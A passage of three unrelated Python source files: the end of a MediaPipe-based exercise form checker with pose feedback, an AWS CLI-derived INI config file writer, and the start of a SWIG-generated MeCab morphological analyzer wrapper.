                               min_tracking_confidence=0.4) as pose:
            results = pose.process(frame)
            return results.pose_landmarks

    def _get_points_coordinates(self, pose_landmarks, frame_shape):
        # Returns the co-ordinates of the points after translational normalization:
        # every joint is expressed in pixels relative to the mid-hip point.
        h, w = frame_shape[:2]
        lhip, rhip = (pose_landmarks.landmark[self.mp_pose.PoseLandmark['LEFT_HIP']],
                      pose_landmarks.landmark[self.mp_pose.PoseLandmark['RIGHT_HIP']])
        # find the mid-hip coordinates
        mid_hips = Point((lhip.x+rhip.x)*0.5, (lhip.y+rhip.y)*0.5, (lhip.visibility+rhip.visibility)*0.5)
        points = list()
        for name in self.point_names:
            point = pose_landmarks.landmark[self.mp_pose.PoseLandmark[name]]
            points.append(Point((point.x-mid_hips.x)*w, (point.y-mid_hips.y)*h, point.visibility))
        return points

    def _get_distance(self, p1, p2):
        # Returns the Euclidean distance between two points.
        p = p1 - p2
        return np.sqrt(p.x**2 + p.y**2)

    def _get_angle(self, p1, p2, p3):
        # Returns the anti-clockwise angle (degrees, 0-360) made at p2 by p1 and p3.
        ab, bc = p1-p2, p3-p2
        dot_prod = (ab.x*bc.x)+(ab.y*bc.y)
        mod_prod = np.sqrt((ab.x**2+ab.y**2)*(bc.x**2+bc.y**2))
        # BUGFIX: clip the cosine into [-1, 1] — floating-point error can push
        # it slightly outside the arccos domain, which produced nan angles.
        angle = np.rad2deg(np.arccos(np.clip(dot_prod/mod_prod, -1.0, 1.0)))  # in degrees
        det = ab.x*bc.y - ab.y*bc.x  # determinant for correct quadrant
        angle = 360-angle if det<0 else angle
        return angle

    def get_frame_features(self, frame):
        """ returns the featurized form of the given frame(image array) """
        pose_landmarks = self._get_frame_landmarks(frame)
        features = None
        self.coordinates = None
        if pose_landmarks is not None:
            # get all the required body points
            (nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
             left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle,
             left_foot_idx, right_foot_idx) = self._get_points_coordinates(pose_landmarks, frame.shape)
            # NOTE(review): these asserts carry user-facing messages but are
            # stripped under `python -O`; raise an exception instead if the
            # validation must survive optimization.
            assert (nose.visibility>0.4), "Face not in frame"
            assert (left_shoulder.visibility>0.4 and right_shoulder.visibility>0.4), "Shoulders not in frame"
            assert (left_hip.visibility>0.4 and right_hip.visibility>0.4), "Body not in frame"
            assert (left_foot_idx.visibility>0.4 and right_foot_idx.visibility>0.4), "Feet not in frame"
            # calculate the torso length which will be used to normalise the distances
            neck = (left_shoulder + right_shoulder)*0.5
            torso_len = (self._get_distance(neck, left_hip) + self._get_distance(neck, right_hip))*0.5
            # find body core - mid-point of line joining mid-shoulder and mid-hips
            mid_hips = (left_hip + right_hip)*0.5
            core = (neck + mid_hips)*0.5
            # calculate distance features
            dist_feats = np.array([
                # distance of limbs from body core
                self._get_distance(core, nose),
                self._get_distance(core, left_elbow), self._get_distance(core, right_elbow),
                self._get_distance(core, left_wrist), self._get_distance(core, right_wrist),
                self._get_distance(core, left_knee), self._get_distance(core, right_knee),
                self._get_distance(core, left_ankle), self._get_distance(core, right_ankle),
                # 2-joints distances
                self._get_distance(left_shoulder, left_wrist), self._get_distance(right_shoulder, right_wrist),
                self._get_distance(left_hip, left_elbow), self._get_distance(right_hip, right_elbow),
                self._get_distance(left_shoulder, left_knee), self._get_distance(right_shoulder, right_knee),
                self._get_distance(left_hip, left_ankle), self._get_distance(right_hip, right_ankle),
                self._get_distance(left_knee, left_foot_idx), self._get_distance(right_knee, right_foot_idx),
                # cross joint distances
                self._get_distance(left_wrist, right_wrist), self._get_distance(left_elbow, right_elbow),
                self._get_distance(left_shoulder, right_shoulder), self._get_distance(left_hip, right_hip),
                self._get_distance(left_knee, right_knee)
            ])
            # normalise dist features so they are invariant to subject size/camera distance
            dist_feats /= torso_len
            # calculate angle features
            ground = Point(core.x, frame.shape[0]-1, 0.9)
            angle_feats = np.array([
                # angles made by neck with both elbows, angles made by hips with both knees,
                # spine angle, and body with respect to ground
                self._get_angle(left_elbow, neck, right_elbow), self._get_angle(left_knee, mid_hips, right_knee),
                self._get_angle(nose, neck, mid_hips), self._get_angle(nose, core, ground)
            ])
            # normalise angles into [0, 1]
            angle_feats /= 360.0
            visibility_feats = np.array([
                # visibility features of left and right profiles(upper and lower body)
                (left_shoulder.visibility + left_hip.visibility)*0.5,
                (left_hip.visibility + left_knee.visibility)*0.5,
                (right_shoulder.visibility + right_hip.visibility)*0.5,
                (right_hip.visibility + right_knee.visibility)*0.5
            ])
            features = np.hstack((dist_feats, angle_feats, visibility_feats))
            # Save the coordinates for pose checking later
            self.coordinates = (nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
                                left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle, left_foot_idx,
                                right_foot_idx, neck, torso_len, mid_hips, core, ground)
        return features

    def pose_corrector(self, pose_clas):
        """
        This function checks the Pose for various key-points specific to it and recommends
        changes to the user. It uses the stored co-ordinates of just previously featurized frame.

        Returns a single feedback string (sentences joined by spaces), or None
        when there is nothing to correct or no coordinates are stored.
        """
        feedback = list()
        if self.coordinates is not None:
            (nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
             left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle, left_foot_idx,
             right_foot_idx, neck, torso_len, mid_hips, core, ground) = self.coordinates
            if pose_clas.startswith('jumping_jacks'):
                feet_width = self._get_distance(left_ankle, right_ankle)
                shoulder_width = self._get_distance(left_shoulder, right_shoulder)
                if pose_clas=='jumping_jacks-start':
                    # feet should be around (2*shoulder width) apart, hands stretched straight
                    left_hand_angle = self._get_angle(left_shoulder, left_elbow, left_wrist)
                    left_hand_angle = min(left_hand_angle, 360-left_hand_angle)
                    right_hand_angle = self._get_angle(right_shoulder, right_elbow, right_wrist)
                    right_hand_angle = min(right_hand_angle, 360-right_hand_angle)
                    if(feet_width <= shoulder_width*0.85):
                        feedback.append("Your feet are too close when starting Jumping Jacks.")
                    if(feet_width > 2*shoulder_width):
                        feedback.append("Your feet are too wide when starting Jumping Jacks.")
                    # BUGFIX: the original tested (angle < 120 and angle > 180),
                    # which is always False, so this feedback was unreachable.
                    # The clamped angle is <= 180, so a bent arm is simply angle < 120.
                    if (left_hand_angle < 120) or (right_hand_angle < 120):
                        feedback.append("Keep your arms straight while doing Jumping Jacks.")
                if pose_clas=='jumping_jacks-end':
                    # Keep hands above head and legs (2-3 shoulder length) wide apart
                    if not(nose.y > left_wrist.y and nose.y > right_wrist.y):
                        feedback.append("Keep your arms above your head when ending Jumping Jacks.")
                    if(feet_width <= 1.5*shoulder_width):
                        feedback.append("Your feet are too close when ending Jumping Jacks.")
                    if(feet_width > 2.75*shoulder_width):
                        feedback.append("Your feet are too wide when ending Jumping Jacks.")
            elif pose_clas.startswith('crunches'):
                if pose_clas=='crunches-start':
                    body_angle = self._get_angle(neck, core, mid_hips)
                    body_angle = min(body_angle, 360.0-body_angle)
                    # Keep your body relaxed on ground
                    if body_angle > 190 or body_angle < 170:
                        feedback.append("Lie down in a relaxed way while starting crunches.")
                if pose_clas=='crunches-end':
                    body_angle = self._get_angle(nose, core, mid_hips)
                    body_angle = min(body_angle, 360.0-body_angle)
                    # Keep your head slightly raised from ground
                    if body_angle < 120 or body_angle > 160:
                        feedback.append("Raise your head slightly from neck while ending crunches.")
            elif pose_clas.startswith('lunges'):
                body_angle = self._get_angle(neck, core, mid_hips)
                body_angle = min(body_angle, 360.0-body_angle)
                # core straight
                if body_angle > 190 or body_angle < 170:
                    feedback.append("Keep your core straight while doing lunges.")
                if pose_clas=='lunges-start':
                    pass
                if pose_clas=='lunges-end':
                    # knees should not cross toes
                    left_leg_angle = self._get_angle(left_ankle, left_knee, left_hip)
                    left_leg_angle = min(left_leg_angle, 360.0-left_leg_angle)
                    right_leg_angle = self._get_angle(right_ankle, right_knee, right_hip)
                    right_leg_angle = min(right_leg_angle, 360.0-right_leg_angle)
                    if ((left_leg_angle > 100 or left_leg_angle < 80) or (right_leg_angle > 100 or right_leg_angle < 80)):
                        feedback.append("While doing lunges your knees should be at right angles.")
            elif pose_clas.startswith('planks'):
                # check if the whole body is in straight line -
                # neck, core, mid-hips :: mid-hips, mid-knees, mid-ankle
                upper_body_angle = self._get_angle(neck, core, mid_hips)
                upper_body_angle = min(upper_body_angle, 360.0-upper_body_angle)
                mid_knees = (left_knee + right_knee)*0.5
                mid_ankle = (left_ankle + right_ankle)*0.5
                lower_body_angle = self._get_angle(mid_hips, mid_knees, mid_ankle)
                lower_body_angle = min(lower_body_angle, 360.0-lower_body_angle)
                # BUGFIX: the original tested (angle < 165 and angle > 190),
                # which is always False, so plank feedback was unreachable.
                # The clamped angle is <= 180; "not straight" means angle < 165.
                if upper_body_angle < 165:
                    feedback.append("Straighten your upper body while doing planks.")
                if lower_body_angle < 165:
                    feedback.append("Straighten your lower body while doing planks.")
            elif pose_clas.startswith('squats'):
                if pose_clas=='squats-start':
                    pass
                if pose_clas=='squats-end':
                    # knees should not cross toes
                    if (right_knee.x-right_hip.x >= 0):
                        # facing right
                        dist = right_foot_idx.x - right_knee.x
                    else:
                        dist = left_knee.x - left_foot_idx.x
                    if dist <= 0:
                        feedback.append("While doing squats your knees should not cross your toes.")
            else:
                pass
        return " ".join(feedback) if len(feedback) else None

    def lightcheck(self, frame):
        """
        Function to check light conditions given an image frame.

        Returns a user-facing message when more than 30% of the pixels are very
        dark or very bright, else None.
        """
        thres, bright_thres, dark_thres = 0.3, 225, 30
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        total_pixels = np.size(gray)
        dark_pixels = np.sum(gray <= dark_thres)
        bright_pixels = np.sum(gray >= bright_thres)
        light_status = None
        if dark_pixels/total_pixels > thres:
            light_status = "Please come to a lighted area."
        elif bright_pixels/total_pixels > thres:
            light_status = "Your screen is overexposed. Please adjust."
        return light_status
if __name__ == '__main__':
    # Manual smoke test: featurize frames extracted from a sample video.
    # The processing loop is intentionally left commented out; running it
    # needs a local video file plus the frame_extractor module.
    import cv2
    import time
    from frame_extractor import FrameExtractor
    fproc = FrameProcessor()
    # fex = FrameExtractor(time_interval=50)
    # user_frames = fex.get_frames('../../resources/videos/user_video_webcam.mp4')
    # for frame in user_frames:
    # start_time = time.time()
    # frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
    # feats = fproc.get_frame_features(frame)
    # if feats is not None:
    # print(feats.shape)
    # else:
    # print("No features")
    # print("Time taken: %f" %(time.time()-start_time))
    # print('-'*50)
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
# Extracted from https://github.com/aws/aws-cli/blob/master/awscli/customizations/configure/writer.py
import os
import re
class SectionNotFoundError(Exception):
    """Raised when the requested INI section cannot be found in the config file."""
class ConfigFileWriter(object):
    """Updates INI-style config files in place, preserving unrelated lines.

    Vendored from awscli (customizations/configure/writer.py); the update
    logic is intentionally line-oriented so comments and formatting of
    untouched entries survive a rewrite.
    """
    # Matches a section header such as ``[profile name]``.
    SECTION_REGEX = re.compile(r'\[(?P<header>[^]]+)\]')
    # Matches an ``option = value`` (or ``option : value``) line; the leading
    # whitespace captured in ``option`` is later used to infer nesting depth.
    OPTION_REGEX = re.compile(
        r'(?P<option>[^:=][^:=]*)'
        r'\s*(?P<vi>[:=])\s*'
        r'(?P<value>.*)$'
    )

    def update_config(self, new_values, config_filename):
        """Update config file with new values.

        This method will update a section in a config file with
        new key value pairs.

        This method provides a few conveniences:

        * If the ``config_filename`` does not exist, it will
          be created. Any parent directories will also be created
          if necessary.
        * If the section to update does not exist, it will be created.
        * Any existing lines that are specified by ``new_values``
          **will not be touched**. This ensures that commented out
          values are left unaltered.

        :type new_values: dict
        :param new_values: The values to update. There is a special
            key ``__section__``, that specifies what section in the INI
            file to update. If this key is not present, then the
            ``default`` section will be updated with the new values.

        :type config_filename: str
        :param config_filename: The config filename where values will be
            written.
        """
        section_name = new_values.pop('__section__', 'default')
        if not os.path.isfile(config_filename):
            # No file yet: create it (plus parent dirs) and append the section.
            self._create_file(config_filename)
            self._write_new_section(section_name, new_values, config_filename)
            return
        with open(config_filename, 'r') as f:
            contents = f.readlines()
        # We can only update a single section at a time so we first need
        # to find the section in question
        try:
            self._update_section_contents(contents, section_name, new_values)
            with open(config_filename, 'w') as f:
                f.write(''.join(contents))
        except SectionNotFoundError:
            self._write_new_section(section_name, new_values, config_filename)

    def _create_file(self, config_filename):
        # Create the file as well as the parent dir if needed.
        dirname = os.path.split(config_filename)[0]
        if not os.path.isdir(dirname):
            os.makedirs(dirname)
        # 0o600: config may hold credentials, so restrict to the owner.
        with os.fdopen(os.open(config_filename,
                               os.O_WRONLY | os.O_CREAT, 0o600), 'w'):
            pass

    def _write_new_section(self, section_name, new_values, config_filename):
        # Append a brand-new ``[section]`` with all values to the end of the file.
        with open(config_filename, 'a') as f:
            f.write('\n[%s]\n' % section_name)
            contents = []
            self._insert_new_values(line_number=0,
                                    contents=contents,
                                    new_values=new_values)
            f.write(''.join(contents))

    def _find_section_start(self, contents, section_name):
        # Return the index of the line holding ``[section_name]``; raises
        # SectionNotFoundError when the section is absent.
        for i in range(len(contents)):
            line = contents[i]
            if line.strip().startswith(('#', ';')):
                # This is a comment, so we can safely ignore this line.
                continue
            match = self.SECTION_REGEX.search(line)
            if match is not None and self._matches_section(match,
                                                           section_name):
                return i
        raise SectionNotFoundError(section_name)

    def _update_section_contents(self, contents, section_name, new_values):
        # First, find the line where the section_name is defined.
        # This will be the value of i.
        new_values = new_values.copy()
        # ``contents`` is a list of file line contents.
        section_start_line_num = self._find_section_start(contents,
                                                          section_name)
        # If we get here, then we've found the section. We now need
        # to figure out if we're updating a value or adding a new value.
        # There's 2 cases. Either we're setting a normal scalar value
        # of, we're setting a nested value.
        last_matching_line = section_start_line_num
        j = last_matching_line + 1
        while j < len(contents):
            line = contents[j]
            if self.SECTION_REGEX.search(line) is not None:
                # We've hit a new section which means the config key is
                # not in the section. We need to add it here.
                self._insert_new_values(line_number=last_matching_line,
                                        contents=contents,
                                        new_values=new_values)
                return
            match = self.OPTION_REGEX.search(line)
            if match is not None:
                last_matching_line = j
                key_name = match.group(1).strip()
                if key_name in new_values:
                    # We've found the line that defines the option name.
                    # if the value is not a dict, then we can write the line
                    # out now.
                    if not isinstance(new_values[key_name], dict):
                        option_value = new_values[key_name]
                        new_line = '%s = %s\n' % (key_name, option_value)
                        contents[j] = new_line
                        del new_values[key_name]
                    else:
                        # Nested value: descend and rewrite the sub-attributes.
                        j = self._update_subattributes(
                            j, contents, new_values[key_name],
                            len(match.group(1)) - len(match.group(1).lstrip()))
                        return
            j += 1
        if new_values:
            # Keys that were never matched get appended after the last
            # option line seen in the section.
            if not contents[-1].endswith('\n'):
                contents.append('\n')
            self._insert_new_values(line_number=last_matching_line + 1,
                                    contents=contents,
                                    new_values=new_values)

    def _update_subattributes(self, index, contents, values, starting_indent):
        # Rewrite the indented sub-options under a nested key; ``values`` keys
        # that were updated in place are deleted, leftovers are inserted when
        # the indent returns to ``starting_indent`` or the sub-block ends.
        index += 1
        for i in range(index, len(contents)):
            line = contents[i]
            match = self.OPTION_REGEX.search(line)
            if match is not None:
                current_indent = len(
                    match.group(1)) - len(match.group(1).lstrip())
                key_name = match.group(1).strip()
                if key_name in values:
                    option_value = values[key_name]
                    new_line = '%s%s = %s\n' % (' ' * current_indent,
                                                key_name, option_value)
                    contents[i] = new_line
                    del values[key_name]
                if starting_indent == current_indent or \
                        self.SECTION_REGEX.search(line) is not None:
                    # We've arrived at the starting indent level so we can just
                    # write out all the values now.
                    self._insert_new_values(i - 1, contents, values, ' ')
                    break
        else:
            if starting_indent != current_indent:
                # The option is the last option in the file
                self._insert_new_values(i, contents, values, ' ')
        return i

    def _insert_new_values(self, line_number, contents, new_values, indent=''):
        # Render every remaining key (dicts become indented sub-blocks) and
        # splice them into ``contents`` just after ``line_number``.
        new_contents = []
        for key, value in list(new_values.items()):
            if isinstance(value, dict):
                subindent = indent + '    '
                new_contents.append('%s%s =\n' % (indent, key))
                for subkey, subval in list(value.items()):
                    new_contents.append('%s%s = %s\n' % (subindent, subkey,
                                                         subval))
            else:
                new_contents.append('%s%s = %s\n' % (indent, key, value))
            del new_values[key]
        contents.insert(line_number + 1, ''.join(new_contents))

    def _matches_section(self, match, section_name):
        # A multi-word section like ``profile dev`` also matches the quoted
        # form ``[profile "dev"]`` used by some tools.
        parts = section_name.split(' ')
        unquoted_match = match.group(0) == '[%s]' % section_name
        if len(parts) > 1:
            quoted_match = match.group(0) == '[%s "%s"]' % (
                parts[0], ' '.join(parts[1:]))
            return unquoted_match or quoted_match
        return unquoted_match
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
from glob import glob
import platform
import distutils.sysconfig as config
import shutil as sh
import os
if platform.system() == "Windows":
    # Windows lazy installation: move the compiled _MeCab/_mecab extension
    # from site-packages into the package's data/ directory on first import.
    for key in ["_MeCab", "_mecab"]:
        mecab_lib = glob("%s/%s*" % (config.get_python_lib(), key))
        if mecab_lib:
            mecab_lib = mecab_lib[0]
            mecab_dir = os.path.dirname(mecab_lib)
            try:
                sh.copy(mecab_lib, "%s/eunjeon/data/" % mecab_dir)
                os.remove(mecab_lib)
            except FileNotFoundError:
                pass
            break
# Shown when the native module cannot be imported on Windows.
# NOTE(review): the typo "occured" is kept — this is a runtime string.
instruction = '''ImportError has occured.
Please register mecab directory to path using following command:
# 64-bit
>set PATH=%PATH%;C:\\Program Files\\MeCab\\bin
# 32-bit
>set PATH=%PATH%;C:\\Program Files (x86)\\MeCab\\bin
WARNING: Those commands will only remain in current session.
'''
# SWIG boilerplate: locate and import the native _MeCab extension using the
# mechanism appropriate for the running interpreter version.
if _swig_python_version_info >= (2, 7, 0):
    def swig_import_helper():
        import importlib
        # Try the packaged location (<pkg>.data._MeCab) first, then a
        # top-level _MeCab module.
        pkg = __name__.rpartition('.')[0]
        mname = '.'.join((pkg, "data", '_MeCab')).lstrip('.')
        try:
            return importlib.import_module(mname)
        except ImportError:
            try:
                return importlib.import_module('_MeCab')
            except ImportError:
                if platform.system() == "Windows":
                    # Surface the PATH-setup instructions defined above.
                    raise ImportError(instruction)
    _MeCab = swig_import_helper()
    del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_MeCab', [dirname(__file__)])
        except ImportError:
            try:
                import _MeCab
                return _MeCab
            except:
                import eunjeon.data._MeCab as _MeCab
                return _MeCab
        try:
            _mod = imp.load_module('_MeCab', fp, pathname, description)
        finally:
            if fp is not None:
                fp.close()
        return _mod
    _MeCab = swig_import_helper()
    del swig_import_helper
else:
    import _MeCab
del _swig_python_version_info
# Alias the builtin `property` for the generated proxy classes below.
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.
# Py2/Py3 compatibility: expose the builtins module under the Py2 name.
try:
    import builtins as __builtin__
except ImportError:
    import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    """Set attribute `name` on a SWIG proxy via the generated C setter.

    With ``static`` true, names without a generated setter are rejected
    instead of being added to the instance ``__dict__``.
    """
    if (name == "thisown"):
        # Ownership flag lives on the underlying SwigPyObject.
        return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    """Non-static variant of `_swig_setattr_nondynamic` (new attributes allowed)."""
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
    """Read attribute `name` from a SWIG proxy via the generated C getter."""
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
    """Generic repr for SWIG proxies; includes the wrapped pointer when available."""
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# Old/new-style class compatibility: on interpreters without new-style
# `object`, fall back to a plain class and disable property-based access
# (_newclass gates every `_swig_property` assignment below).
try:
    _object = object
    _newclass = 1
except __builtin__.Exception:
    class _object:
        pass
    _newclass = 0
class DictionaryInfo(_object):
    """Generated SWIG proxy exposing MeCab dictionary metadata as read-only fields."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, DictionaryInfo, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, DictionaryInfo, name)
    __repr__ = _swig_repr
    __swig_getmethods__["filename"] = _MeCab.DictionaryInfo_filename_get
    if _newclass:
        filename = _swig_property(_MeCab.DictionaryInfo_filename_get)
    __swig_getmethods__["charset"] = _MeCab.DictionaryInfo_charset_get
    if _newclass:
        charset = _swig_property(_MeCab.DictionaryInfo_charset_get)
    __swig_getmethods__["size"] = _MeCab.DictionaryInfo_size_get
    if _newclass:
        size = _swig_property(_MeCab.DictionaryInfo_size_get)
    __swig_getmethods__["type"] = _MeCab.DictionaryInfo_type_get
    if _newclass:
        type = _swig_property(_MeCab.DictionaryInfo_type_get)
    __swig_getmethods__["lsize"] = _MeCab.DictionaryInfo_lsize_get
    if _newclass:
        lsize = _swig_property(_MeCab.DictionaryInfo_lsize_get)
    __swig_getmethods__["rsize"] = _MeCab.DictionaryInfo_rsize_get
    if _newclass:
        rsize = _swig_property(_MeCab.DictionaryInfo_rsize_get)
    __swig_getmethods__["version"] = _MeCab.DictionaryInfo_version_get
    if _newclass:
        version = _swig_property(_MeCab.DictionaryInfo_version_get)
    __swig_getmethods__["next"] = _MeCab.DictionaryInfo_next_get
    if _newclass:
        next = _swig_property(_MeCab.DictionaryInfo_next_get)

    def __init__(self):
        this = _MeCab.new_DictionaryInfo()
        try:
            # Newer SWIG runtimes keep a list of owned pointers on self.this.
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    __swig_destroy__ = _MeCab.delete_DictionaryInfo
    __del__ = lambda self: None
DictionaryInfo_swigregister = _MeCab.DictionaryInfo_swigregister
DictionaryInfo_swigregister(DictionaryInfo)
class Path(_object):
    """Generated SWIG proxy for a lattice path; only created by the C library."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Path, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Path, name)

    def __init__(self, *args, **kwargs):
        # Instances are produced by the C library, never constructed from Python.
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    __swig_getmethods__["rnode"] = _MeCab.Path_rnode_get
    if _newclass:
        rnode = _swig_property(_MeCab.Path_rnode_get)
    __swig_getmethods__["rnext"] = _MeCab.Path_rnext_get
    if _newclass:
        rnext = _swig_property(_MeCab.Path_rnext_get)
    __swig_getmethods__["lnode"] = _MeCab.Path_lnode_get
    if _newclass:
        lnode = _swig_property(_MeCab.Path_lnode_get)
    __swig_getmethods__["lnext"] = _MeCab.Path_lnext_get
    if _newclass:
        lnext = _swig_property(_MeCab.Path_lnext_get)
    __swig_getmethods__["cost"] = _MeCab.Path_cost_get
    if _newclass:
        cost = _swig_property(_MeCab.Path_cost_get)
    # `prob` is the only writable field on Path.
    __swig_setmethods__["prob"] = _MeCab.Path_prob_set
    __swig_getmethods__["prob"] = _MeCab.Path_prob_get
    if _newclass:
        prob = _swig_property(_MeCab.Path_prob_get, _MeCab.Path_prob_set)
Path_swigregister = _MeCab.Path_swigregister
Path_swigregister(Path)
class Node(_object):
    """Generated SWIG proxy for a lattice node (morpheme candidate); only created by the C library."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Node, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Node, name)

    def __init__(self, *args, **kwargs):
        # Instances are produced by the C library, never constructed from Python.
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    __swig_getmethods__["prev"] = _MeCab.Node_prev_get
    if _newclass:
        prev = _swig_property(_MeCab.Node_prev_get)
    __swig_getmethods__["next"] = _MeCab.Node_next_get
    if _newclass:
        next = _swig_property(_MeCab.Node_next_get)
    __swig_getmethods__["enext"] = _MeCab.Node_enext_get
    if _newclass:
        enext = _swig_property(_MeCab.Node_enext_get)
    __swig_getmethods__["bnext"] = _MeCab.Node_bnext_get
    if _newclass:
        bnext = _swig_property(_MeCab.Node_bnext_get)
    __swig_getmethods__["rpath"] = _MeCab.Node_rpath_get
    if _newclass:
        rpath = _swig_property(_MeCab.Node_rpath_get)
    __swig_getmethods__["lpath"] = _MeCab.Node_lpath_get
    if _newclass:
        lpath = _swig_property(_MeCab.Node_lpath_get)
    __swig_getmethods__["feature"] = _MeCab.Node_feature_get
    if _newclass:
        feature = _swig_property(_MeCab.Node_feature_get)
    __swig_getmethods__["id"] = _MeCab.Node_id_get
    if _newclass:
        id = _swig_property(_MeCab.Node_id_get)
    __swig_getmethods__["length"] = _MeCab.Node_length_get
    if _newclass:
        length = _swig_property(_MeCab.Node_length_get)
    __swig_getmethods__["rlength"] = _MeCab.Node_rlength_get
    if _newclass:
        rlength = _swig_property(_MeCab.Node_rlength_get)
    __swig_getmethods__["rcAttr"] = _MeCab.Node_rcAttr_get
    if _newclass:
        rcAttr = _swig_property(_MeCab.Node_rcAttr_get)
    __swig_getmethods__["lcAttr"] = _MeCab.Node_lcAttr_get
    if _newclass:
        lcAttr = _swig_property(_MeCab.Node_lcAttr_get)
    __swig_getmethods__["posid"] = _MeCab.Node_posid_get
    if _newclass:
        posid = _swig_property(_MeCab.Node_posid_get)
    __swig_getmethods__["char_type"] = _MeCab.Node_char_type_get
    if _newclass:
        char_type = _swig_property(_MeCab.Node_char_type_get)
    __swig_getmethods__["stat"] = _MeCab.Node_stat_get
    if _newclass:
        stat = _swig_property(_MeCab.Node_stat_get)
    __swig_getmethods__["isbest"] = _MeCab.Node_isbest_get
    if _newclass:
        isbest = _swig_property(_MeCab.Node_isbest_get)
    __swig_getmethods__["alpha"] = _MeCab.Node_alpha_get
    if _newclass:
        alpha = _swig_property(_MeCab.Node_alpha_get)
    __swig_getmethods__["beta"] = _MeCab.Node_beta_get
    if _newclass:
        beta = _swig_property(_MeCab.Node_beta_get)
    # `prob` is the only writable field on Node.
    __swig_setmethods__["prob"] = _MeCab.Node_prob_set
    __swig_getmethods__["prob"] = _MeCab.Node_prob_get
    if _newclass:
        prob = _swig_property(_MeCab.Node_prob_get, _MeCab.Node_prob_set)
    __swig_getmethods__["wcost"] = _MeCab.Node_wcost_get
    if _newclass:
        wcost = _swig_property(_MeCab.Node_wcost_get)
    __swig_getmethods__["cost"] = _MeCab.Node_cost_get
    if _newclass:
        cost = _swig_property(_MeCab.Node_cost_get)
    __swig_getmethods__["surface"] = _MeCab.Node_surface_get
    if _newclass:
        surface = _swig_property(_MeCab.Node_surface_get)
Node_swigregister = _MeCab.Node_swigregister
Node_swigregister(Node)
# Node status constants (values of Node.stat).
MECAB_NOR_NODE = _MeCab.MECAB_NOR_NODE
MECAB_UNK_NODE = _MeCab.MECAB_UNK_NODE
MECAB_BOS_NODE = _MeCab.MECAB_BOS_NODE
MECAB_EOS_NODE = _MeCab.MECAB_EOS_NODE
MECAB_EON_NODE = _MeCab.MECAB_EON_NODE
# Dictionary type constants (values of DictionaryInfo.type).
MECAB_SYS_DIC = _MeCab.MECAB_SYS_DIC
MECAB_USR_DIC = _MeCab.MECAB_USR_DIC
MECAB_UNK_DIC = _MeCab.MECAB_UNK_DIC
# Lattice request-type flags (used with the *_request_type methods).
MECAB_ONE_BEST = _MeCab.MECAB_ONE_BEST
MECAB_NBEST = _MeCab.MECAB_NBEST
MECAB_PARTIAL = _MeCab.MECAB_PARTIAL
MECAB_MARGINAL_PROB = _MeCab.MECAB_MARGINAL_PROB
MECAB_ALTERNATIVE = _MeCab.MECAB_ALTERNATIVE
MECAB_ALL_MORPHS = _MeCab.MECAB_ALL_MORPHS
MECAB_ALLOCATE_SENTENCE = _MeCab.MECAB_ALLOCATE_SENTENCE
# Boundary constraint constants (used with set_boundary_constraint).
MECAB_ANY_BOUNDARY = _MeCab.MECAB_ANY_BOUNDARY
MECAB_TOKEN_BOUNDARY = _MeCab.MECAB_TOKEN_BOUNDARY
MECAB_INSIDE_TOKEN = _MeCab.MECAB_INSIDE_TOKEN
class Lattice(_object):
    """SWIG-generated proxy for the MeCab ``Lattice`` C++ class.

    A Lattice holds one input sentence together with its analysis state
    (nodes, request type, constraints).  Every method is a thin delegate to
    the C extension module ``_MeCab``; see the MeCab C++ API documentation
    for the exact semantics.  Do not edit by hand beyond comments — this
    file is regenerated by SWIG.
    """
    # Attribute get/set is routed through the SWIG helper functions.
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Lattice, name, value)
    __swig_getmethods__ = {}
